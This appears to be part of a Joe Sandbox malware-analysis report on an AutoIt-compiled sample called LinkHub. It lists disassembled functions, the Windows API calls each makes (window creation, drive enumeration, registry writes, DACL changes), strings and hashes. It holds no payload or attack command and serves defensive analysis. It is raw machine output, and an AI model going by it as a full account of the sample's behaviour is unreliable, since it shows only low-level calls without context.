CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C33822
OleLoadPicture.OLEAUT32(?,00000000,00000000,00C50C04,00000000), ref: 00C33838
GlobalFree.KERNEL32(00000000), ref: 00C33848
CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00C3386E
SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00C3388D
SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C338AF
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C33A9C

Strings

DISPLAY, xrefs: 00C338FF
AutoIt v3, xrefs: 00C3374F
static, xrefs: 00C33797, 00C338EE
, xrefs: 00C33A22

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: ef2b4a890c24dc158d7b87cd3f2d2c677db8354119ef0c7d0bfc89450f892e45
Instruction ID: 9efe651b410ef94caf517b854297ccb5a9d78e3315d45de81e8b6e482ea55e8e
Opcode Fuzzy Hash: ef2b4a890c24dc158d7b87cd3f2d2c677db8354119ef0c7d0bfc89450f892e45
Instruction Fuzzy Hash: F5026A75A10215AFDB14DF64CC89FAE7BB9FB49710F008558F916AB2A0CB74EE01CB60

Function 00C47B0D Relevance: 49.8, APIs: 33, Instructions: 273COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 00C47B67
GetSysColorBrush.USER32(0000000F), ref: 00C47B98
GetSysColor.USER32(0000000F), ref: 00C47BA4
SetBkColor.GDI32(?,000000FF), ref: 00C47BBE
SelectObject.GDI32(?,?), ref: 00C47BCD
InflateRect.USER32(?,000000FF,000000FF), ref: 00C47BF8
GetSysColor.USER32(00000010), ref: 00C47C00
CreateSolidBrush.GDI32(00000000), ref: 00C47C07
FrameRect.USER32(?,?,00000000), ref: 00C47C16
DeleteObject.GDI32(00000000), ref: 00C47C1D
InflateRect.USER32(?,000000FE,000000FE), ref: 00C47C68
FillRect.USER32(?,?,?), ref: 00C47C9A
GetWindowLongW.USER32(?,000000F0), ref: 00C47CBC

Part of subcall function 00C47E22: GetSysColor.USER32(00000012), ref: 00C47E5B
Part of subcall function 00C47E22: SetTextColor.GDI32(?,00C47B2D), ref: 00C47E5F
Part of subcall function 00C47E22: GetSysColorBrush.USER32(0000000F), ref: 00C47E75
Part of subcall function 00C47E22: GetSysColor.USER32(0000000F), ref: 00C47E80
Part of subcall function 00C47E22: GetSysColor.USER32(00000011), ref: 00C47E9D
Part of subcall function 00C47E22: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00C47EAB
Part of subcall function 00C47E22: SelectObject.GDI32(?,00000000), ref: 00C47EBC
Part of subcall function 00C47E22: SetBkColor.GDI32(?,?), ref: 00C47EC5
Part of subcall function 00C47E22: SelectObject.GDI32(?,?), ref: 00C47ED2
Part of subcall function 00C47E22: InflateRect.USER32(?,000000FF,000000FF), ref: 00C47EF1
Part of subcall function 00C47E22: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00C47F08
Part of subcall function 00C47E22: GetWindowLongW.USER32(?,000000F0), ref: 00C47F15

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
String ID:
API String ID: 4124339563-0
Opcode ID: b9a2a94c2f91d285cbc6dca0449df4768d905a2cc969ddd7a1027438c1644204
Instruction ID: c48468dd5ee09c18e95b9a6626041da285f4946f9b29dd6d3d4b8321ec97150e
Opcode Fuzzy Hash: b9a2a94c2f91d285cbc6dca0449df4768d905a2cc969ddd7a1027438c1644204
Instruction Fuzzy Hash: 47A16A76508301AFDB11AF64DC48B6FBBA9FB4A320F100B19FA63A61E0DB75D944CB51

Function 00BB1625 Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 480windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?), ref: 00BB16B4
SendMessageW.USER32(?,00001308,?,00000000), ref: 00BF2B07
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00BF2B40
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00BF2F85

Part of subcall function 00BB1802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00BB1488,?,00000000,?,?,?,?,00BB145A,00000000,?), ref: 00BB1865

SendMessageW.USER32(?,00001053), ref: 00BF2FC1
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00BF2FD8
ImageList_Destroy.COMCTL32(00000000,?), ref: 00BF2FEE
ImageList_Destroy.COMCTL32(00000000,?), ref: 00BF2FF9

Strings

0, xrefs: 00BF2E11

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
String ID: 0
API String ID: 2760611726-4108050209
Opcode ID: b52471abe4bb04c9f805cc932329a16f44c43e75696f5ca182e9d7211c1e9e12
Instruction ID: 233ece5900d7326cdee561735e9129501b1181bd5eb37a3160d932c26d340dcf
Opcode Fuzzy Hash: b52471abe4bb04c9f805cc932329a16f44c43e75696f5ca182e9d7211c1e9e12
Instruction Fuzzy Hash: D112C0342002059FD725DF18C899BBAB7E5FF45300F5885A9F686DB261CB71EC8ACB91

Function 00C3316E Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 00C3319B
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00C332C7
SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00C33306
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00C33316
CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00C3335D
GetClientRect.USER32(00000000,?), ref: 00C33369
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00C333B2
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00C333C1
GetStockObject.GDI32(00000011), ref: 00C333D1
SelectObject.GDI32(00000000,00000000), ref: 00C333D5
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00C333E5
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C333EE
DeleteDC.GDI32(00000000), ref: 00C333F7
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00C33423
SendMessageW.USER32(00000030,00000000,00000001), ref: 00C3343A
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00C3347A
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00C3348E
SendMessageW.USER32(00000404,00000001,00000000), ref: 00C3349F
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00C334D4
GetStockObject.GDI32(00000011), ref: 00C334DF
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00C334EA
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00C334F4

Strings

DISPLAY, xrefs: 00C333B7
AutoIt v3, xrefs: 00C33355
static, xrefs: 00C333AC, 00C334CE
msctls_progress32, xrefs: 00C33470

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: 165bf1c026f4377ca40ddeb9abd80a3feed8db3e28ee1671fe110681e3f1969a
Instruction ID: 4cd881d2048a5e83f2be409d163d228ea4b5e2d21e4efa6791d761ff73f45a2d
Opcode Fuzzy Hash: 165bf1c026f4377ca40ddeb9abd80a3feed8db3e28ee1671fe110681e3f1969a
Instruction Fuzzy Hash: BFB15C75A00205AFEB14DFA8DC49FAEBBB9FB09710F008154F915E72A1C7B4AD00CBA4

Function 00C25524 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00C25532
GetDriveTypeW.KERNEL32(?,00C4DC30,?,\\.\,00C4DCD0), ref: 00C2560F
SetErrorMode.KERNEL32(00000000,00C4DC30,?,\\.\,00C4DCD0), ref: 00C2577B

Strings

Network, xrefs: 00C25647
SSA, xrefs: 00C256EB
USB, xrefs: 00C256F9
FileBackedVirtual, xrefs: 00C25731
PhysicalDrive, xrefs: 00C255BB
Fixed, xrefs: 00C2564E
ATAPI, xrefs: 00C256D6
SCSI, xrefs: 00C256CF
Fibre, xrefs: 00C256F2
\\.\, xrefs: 00C25584
SATA, xrefs: 00C25715
ATA, xrefs: 00C256DD
RAID, xrefs: 00C25700
1394, xrefs: 00C256E4
Virtual, xrefs: 00C2572A
SAS, xrefs: 00C2570E
RAMDisk, xrefs: 00C25639
MMC, xrefs: 00C25723
Unknown, xrefs: 00C25632, 00C256C8
iSCSI, xrefs: 00C25707
CDROM, xrefs: 00C25640
SSD, xrefs: 00C2568F
Removable, xrefs: 00C25655, 00C2565A

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 69a087c10d76d689d6d3a5295d49eb3d5939ce323149dfc7695503001b097717
Instruction ID: 1b9dc0b8c59a1a8ab6fa8070778d4a011deb2387eba5b28737aa6575a3460723
Opcode Fuzzy Hash: 69a087c10d76d689d6d3a5295d49eb3d5939ce323149dfc7695503001b097717
Instruction Fuzzy Hash: 6B611430A84A19EFCB34DF24D991DBE73A0EF24B50B248165F41AABB91C771DE81DB41

Function 00C41A8F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00C41BC4
GetDesktopWindow.USER32 ref: 00C41BD9
GetWindowRect.USER32(00000000), ref: 00C41BE0
GetWindowLongW.USER32(?,000000F0), ref: 00C41C35
DestroyWindow.USER32(?), ref: 00C41C55
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00C41C89
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00C41CA7
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00C41CB9
SendMessageW.USER32(00000000,00000421,?,?), ref: 00C41CCE
SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00C41CE1
IsWindowVisible.USER32(00000000), ref: 00C41D3D
SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00C41D58
SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00C41D6C
GetWindowRect.USER32(00000000,?), ref: 00C41D84
MonitorFromPoint.USER32(?,?,00000002), ref: 00C41DAA
GetMonitorInfoW.USER32(00000000,?), ref: 00C41DC4
CopyRect.USER32(?,?), ref: 00C41DDB
SendMessageW.USER32(00000000,00000412,00000000), ref: 00C41E46

Strings

(, xrefs: 00C41DB7
0, xrefs: 00C41B6F
tooltips_class32, xrefs: 00C41C82

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: fc1e6dd6516f001b3f2677c2716cb84cdf44d8b7213c7a7a3b0d7754b7d98eec
Instruction ID: ba36fcd651ff6503ac07750dbe3eb179932cc764fa89ea63406f2cf3810a539a
Opcode Fuzzy Hash: fc1e6dd6516f001b3f2677c2716cb84cdf44d8b7213c7a7a3b0d7754b7d98eec
Instruction Fuzzy Hash: BEB17B71604301AFD714DF64C885BAEBBE5FF84310F04895CF99A9B2A1CB71E945CBA2

Function 00C40CDD Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00C40D81
_wcslen.LIBCMT ref: 00C40DBB
_wcslen.LIBCMT ref: 00C40E25
_wcslen.LIBCMT ref: 00C40E8D
_wcslen.LIBCMT ref: 00C40F11
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00C40F61
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00C40FA0

Part of subcall function 00BCFD52: _wcslen.LIBCMT ref: 00BCFD5D

Part of subcall function 00C12B8C: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00C12BA5
Part of subcall function 00C12B8C: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00C12BD7

Strings

VIEWCHANGE, xrefs: 00C41111
SELECTINVERT, xrefs: 00C4101A
SELECTCLEAR, xrefs: 00C40FC9
SELECT, xrefs: 00C40FE4
GETTEXT, xrefs: 00C40E88, 00C40EA3
GETSELECTED, xrefs: 00C4107D
SELECTALL, xrefs: 00C40FB1
GETITEMCOUNT, xrefs: 00C40DB2, 00C40DD3
FINDITEM, xrefs: 00C410C3
GETSELECTEDCOUNT, xrefs: 00C40F0C, 00C40F27
ISSELECTED, xrefs: 00C40F79
GETSUBITEMCOUNT, xrefs: 00C40E20, 00C40E3B
DESELECT, xrefs: 00C41038

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 1103490817-719923060
Opcode ID: c4c279dbb13f2d857c46be154a9061de8ab377d8b269ae16ed690838525ad565
Instruction ID: bbb75f2f9ba1cc2a5c62b6af5d5eae59abb87db25ab3d2728e05137d59b2b441
Opcode Fuzzy Hash: c4c279dbb13f2d857c46be154a9061de8ab377d8b269ae16ed690838525ad565
Instruction Fuzzy Hash: C7E1E1316482418FC714DF24C95197AB7E2FF84354B2489ACF9EA9B3A1DB30EE49CB51

Function 00BB2521 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00BB25F8
GetSystemMetrics.USER32(00000007), ref: 00BB2600
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00BB262B
GetSystemMetrics.USER32(00000008), ref: 00BB2633
GetSystemMetrics.USER32(00000004), ref: 00BB2658
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00BB2675
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00BB2685
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00BB26B8
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00BB26CC
GetClientRect.USER32(00000000,000000FF), ref: 00BB26EA
GetStockObject.GDI32(00000011), ref: 00BB2706
SendMessageW.USER32(00000000,00000030,00000000), ref: 00BB2711

Part of subcall function 00BB19CD: GetCursorPos.USER32(?), ref: 00BB19E1
Part of subcall function 00BB19CD: ScreenToClient.USER32(00000000,?), ref: 00BB19FE
Part of subcall function 00BB19CD: GetAsyncKeyState.USER32(00000001), ref: 00BB1A23
Part of subcall function 00BB19CD: GetAsyncKeyState.USER32(00000002), ref: 00BB1A3D

SetTimer.USER32(00000000,00000000,00000028,00BB199C), ref: 00BB2738

Strings

AutoIt v3 GUI, xrefs: 00BB26B0

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: 5a80a9aff3e9534fd83ecadbd7828d6b157ed60e59bcbddf5e7b356b222bdb19
Instruction ID: 78e41d779c64b1ebcd49349afeae1df65f7d694077ad56b2595e63f4e29fd6c2
Opcode Fuzzy Hash: 5a80a9aff3e9534fd83ecadbd7828d6b157ed60e59bcbddf5e7b356b222bdb19
Instruction Fuzzy Hash: D1B14A756002099FDB14EFA8CC89BEE7BF4FB48714F104259FA16A7290DBB4D940CB55

Function 00C116D7 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00C11A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00C11A60
Part of subcall function 00C11A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,00C114E7,?,?,?), ref: 00C11A6C
Part of subcall function 00C11A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00C114E7,?,?,?), ref: 00C11A7B
Part of subcall function 00C11A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00C114E7,?,?,?), ref: 00C11A82
Part of subcall function 00C11A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00C11A99

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00C11741
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00C11775
GetLengthSid.ADVAPI32(?), ref: 00C1178C
GetAce.ADVAPI32(?,00000000,?), ref: 00C117C6
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00C117E2
GetLengthSid.ADVAPI32(?), ref: 00C117F9
GetProcessHeap.KERNEL32(00000008,00000008), ref: 00C11801
HeapAlloc.KERNEL32(00000000), ref: 00C11808
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00C11829
CopySid.ADVAPI32(00000000), ref: 00C11830
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00C1185F
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00C11881
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00C11893
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C118BA
HeapFree.KERNEL32(00000000), ref: 00C118C1
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C118CA
HeapFree.KERNEL32(00000000), ref: 00C118D1
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C118DA
HeapFree.KERNEL32(00000000), ref: 00C118E1
GetProcessHeap.KERNEL32(00000000,?), ref: 00C118ED
HeapFree.KERNEL32(00000000), ref: 00C118F4

Part of subcall function 00C11ADF: GetProcessHeap.KERNEL32(00000008,00C114FD,?,00000000,?,00C114FD,?), ref: 00C11AED
Part of subcall function 00C11ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,00C114FD,?), ref: 00C11AF4
Part of subcall function 00C11ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00C114FD,?), ref: 00C11B03

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: 4b892c621c622e315623c88b5ff8c7ec00d9bdebbe69a1d03dec239eb56f62f2
Instruction ID: a610a9d0b2dcac28e5f469357792ab5068f1ebf739f4ecd1cecae9ce3937c65b
Opcode Fuzzy Hash: 4b892c621c622e315623c88b5ff8c7ec00d9bdebbe69a1d03dec239eb56f62f2
Instruction Fuzzy Hash: D1714DB5D00209ABEF10DFA5EC44FEEBBB8BF45310F198115EE15A7290D7349A45DB60

Function 00C3CE17 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C3CF1D
RegCreateKeyExW.ADVAPI32(?,?,00000000,00C4DCD0,00000000,?,00000000,?,?), ref: 00C3CFA4
RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 00C3D004
_wcslen.LIBCMT ref: 00C3D054
_wcslen.LIBCMT ref: 00C3D0CF
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 00C3D112
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 00C3D221
RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 00C3D2AD
RegCloseKey.ADVAPI32(?), ref: 00C3D2E1
RegCloseKey.ADVAPI32(00000000), ref: 00C3D2EE
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 00C3D3C0

Strings

REG_MULTI_SZ, xrefs: 00C3D155
REG_BINARY, xrefs: 00C3D373
REG_EXPAND_SZ, xrefs: 00C3D02D
REG_DWORD, xrefs: 00C3D264
REG_SZ, xrefs: 00C3D0A4
REG_QWORD, xrefs: 00C3D323

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: Value$Close$_wcslen$ConnectCreateRegistry
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 9721498-966354055
Opcode ID: f113e2de0ed4b5b8a6fa88e4546430aff9f8f9e1d6e23770f0c14e15a6bab063
Instruction ID: 2f8381a1f2b0c084b2c5b421a8891567cdcda3462b70d670f57f6251b5d1cc11
Opcode Fuzzy Hash: f113e2de0ed4b5b8a6fa88e4546430aff9f8f9e1d6e23770f0c14e15a6bab063
Instruction Fuzzy Hash: 0D1245356142019FDB14EF24C881A6AB7E5FF88714F14889DF99A9B3A2CB71FD41CB81

Function 00C413BA Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00C41462
_wcslen.LIBCMT ref: 00C4149D
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00C414F0
_wcslen.LIBCMT ref: 00C41526
_wcslen.LIBCMT ref: 00C415A2
_wcslen.LIBCMT ref: 00C4161D

Part of subcall function 00BCFD52: _wcslen.LIBCMT ref: 00BCFD5D

